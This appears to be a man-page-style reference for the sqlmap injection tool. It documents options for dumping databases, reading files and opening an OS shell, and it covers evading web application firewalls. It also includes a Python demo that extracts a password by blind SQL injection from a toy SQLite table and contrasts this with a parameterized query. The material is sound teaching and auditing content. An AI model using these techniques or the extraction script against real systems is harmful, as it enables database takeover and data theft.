sqlmap
Automate SQL injection attacks for database takeover
TLDR
Run sqlmap against a single target URL (-u/--url)
Send data in a POST request (--data=DATA; giving --data implies a POST request)
Change the parameter delimiter (--param-del; & is the default)
Select a random User-Agent from ./txt/user-agents.txt and use it (--random-agent)
Provide user credentials for HTTP protocol authentication (--auth-type, e.g. Basic, together with --auth-cred username:password)
SYNOPSIS
sqlmap -u <target URL> [options]
sqlmap -r <request file> [options]
sqlmap [generic options]
PARAMETERS
-u URL, --url=URL
Target URL to scan, e.g. "http://www.example.com/vuln.php?id=1". Every GET parameter in the query string is tested unless -p restricts testing to a named parameter.
-r REQUESTFILE
Load a raw HTTP request from a file (for example one saved from a proxy). Useful for complex requests, custom headers, or non-standard bodies such as JSON; a custom injection point can be marked inside the file with an asterisk (*).
--data=DATA
HTTP POST data string. Used when scanning POST-based forms.
--cookie=COOKIE
HTTP Cookie header value. Required for authenticated scans; cookie values themselves are only tested for injection at --level 2 or higher.
--dbs
Enumerate database management system databases.
--tables
Enumerate database tables for a specific database.
--columns
Enumerate database table columns for a specific table.
--dump
Dump database table entries. Scope it with -D DB, -T TBL, and -C COL (the database, table, and column names learned from --dbs, --tables, and --columns); without them sqlmap dumps far more than is usually needed.
--users
Enumerate database management system users.
--current-user
Retrieve current database management system user.
--current-db
Retrieve current database management system database.
--file-read=FILE
Read a file from the back-end DBMS file system. Requires that the database account has file-system privileges (for example the FILE privilege on MySQL).
--file-write=FILE --file-dest=DEST
Write a local file onto the back-end DBMS file system at the given destination path.
--os-shell
Prompt for an interactive operating system shell on the back-end. Depends on stacked queries being possible and on DBMS privileges: sqlmap uses xp_cmdshell on Microsoft SQL Server and uploads user-defined functions on MySQL and PostgreSQL.
--os-cmd=CMD
Execute a single operating system command on the back-end, under the same preconditions as --os-shell.
--level=LEVEL
Level of tests to perform (1-5, default 1). Higher levels send more payloads and test more inputs: level 2 adds Cookie values, level 3 adds the User-Agent and Referer headers.
--risk=RISK
Risk of tests to perform (1-3, default 1). Risk 2 adds heavy time-based tests; risk 3 adds OR-based boolean tests, which can modify data if the injection lands in an UPDATE or DELETE statement.
--technique=TECH
SQL injection techniques to use: (B)oolean-based blind, (E)rror-based, (U)NION query, (S)tacked queries, (T)ime-based blind, (Q)uery inline. Default: BEUSTQ.
-v VERBOSE
Verbosity level (0-6, default 1). Higher levels provide more output details.
--batch
Never ask for user input, use default behavior.
--output-dir=DIR
Custom output directory path for logs and dumped data.
DESCRIPTION
sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and many niche features for the penetration tester. Its switches range from database fingerprinting and data fetching to accessing the underlying file system and executing commands on the operating system, including via out-of-band connections.
It supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB, and H2. sqlmap detects and exploits boolean-based blind, time-based blind, error-based, UNION query-based, stacked-query, and out-of-band injection. In blind cases it infers data one yes/no question at a time, which is why a dump of even a short value costs dozens of requests. Its versatility and extensive feature set make it a standard tool for auditing web applications for injection flaws.
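The following is an added example, not code from sqlmap: it models the boolean-based blind technique described above against a deliberately vulnerable lookup on an in-memory SQLite database (the table and rows are constructed sample data), shows the per-request yes/no inference sqlmap automates, and shows that the same probes learn nothing from the parameterized version of the query.

```python
"""Boolean-based blind SQL injection, by hand, against a toy vulnerable function.
Added example; the schema, rows and function names are constructed for illustration."""
import sqlite3

# Constructed sample database: the "secret" we will extract is alice's password.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "alice", "s3cr3t"), (2, "bob", "hunter2")])


def lookup_vulnerable(user_id: str) -> bool:
    """Models the vulnerable page: the id parameter is concatenated into the SQL.
    The caller only sees whether a row came back (True/False). That single bit
    per request is the oracle a boolean-based blind attack uses."""
    sql = "SELECT name FROM users WHERE id = " + user_id   # deliberately unsafe
    return conn.execute(sql).fetchone() is not None


def lookup_safe(user_id: str) -> bool:
    """Hardened form: the value is bound as a parameter and is never parsed as SQL."""
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def extract_blind(oracle, column="password", row_filter="name = 'alice'", max_len=32):
    """Infer a column value through a True/False oracle, as sqlmap's 'B' technique does.
    Returns (value, number_of_requests). Every oracle call is one HTTP request in
    the real attack; the prefix '1 AND ...' keeps the original row so that the
    page reflects only the truth of our appended condition."""
    requests = 0

    def ask(condition: str) -> bool:
        nonlocal requests
        requests += 1
        return oracle("1 AND (" + condition + ")")

    # Step 1: find the length with a linear scan (0 means the oracle leaks nothing).
    length = 0
    for i in range(1, max_len + 1):
        if ask(f"(SELECT length({column}) FROM users WHERE {row_filter}) = {i}"):
            length = i
            break

    # Step 2: binary-search each character's code point in printable ASCII (32..126).
    value = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"(SELECT unicode(substr({column}, {pos}, 1)) "
                   f"FROM users WHERE {row_filter}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    secret, n = extract_blind(lookup_vulnerable)
    print(f"vulnerable endpoint leaked {secret!r} in {n} requests")
    secret, n = extract_blind(lookup_safe)
    print(f"parameterized endpoint leaked {secret!r} in {n} requests")
```

Run it and the vulnerable endpoint gives up the six-character secret in roughly fifty oracle calls, which is the request volume to expect from sqlmap per short value in blind mode; the parameterized endpoint answers False to every probe because the whole string is compared as a value, not executed.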
CAVEATS
Using sqlmap for unauthorized SQL injection attempts is illegal and unethical. Only use this tool on systems for which you have explicit, written permission from the owner. Be aware that running sqlmap can generate a significant amount of network traffic and database activity, potentially impacting the performance and stability of the target system, and leaving extensive logs. It may also trigger intrusion detection/prevention systems (IDS/IPS).
ETHICAL USE AND LEGALITY
It is paramount to understand that sqlmap is a powerful tool designed for legitimate security auditing and penetration testing. Its misuse against systems without explicit authorization is illegal and can lead to severe penalties. Always ensure you have proper authorization and understand the legal implications before using sqlmap or any similar security tool.
INSTALLATION
sqlmap is pre-installed in penetration testing distributions like Kali Linux and Parrot OS. Elsewhere it can be installed by cloning its GitHub repository (https://github.com/sqlmapproject/sqlmap) and running sqlmap.py with Python, or via Python's pip package manager: pip install sqlmap. Users should always refer to the official documentation for the latest installation instructions.
WAF EVASION
sqlmap includes several features for getting payloads past Web Application Firewalls (WAFs) and similar filters. The main one is tamper scripts (--tamper), small Python modules that rewrite each payload before it is sent, for example replacing spaces with inline comments, randomizing keyword case, or URL-encoding characters; several can be chained with a comma-separated list. Supporting options include --random-agent, --headers for custom headers, --delay to pace requests, and --proxy or --tor to route traffic. Bypassing a WAF still requires understanding which signatures the specific product matches; tamper scripts only work when they break those signatures without breaking the SQL.
HISTORY
sqlmap was started in 2006 by Daniele Bellucci, was developed primarily by Bernardo Damele A. G., and has been maintained since 2009 with Miroslav Stampar, who continues to lead development. It quickly gained recognition within the cybersecurity community for its effectiveness and comprehensive feature set, and over the years has added support for new database technologies, injection techniques, and evasion methods. It has become a standard, go-to tool for web application penetration testers and security auditors worldwide.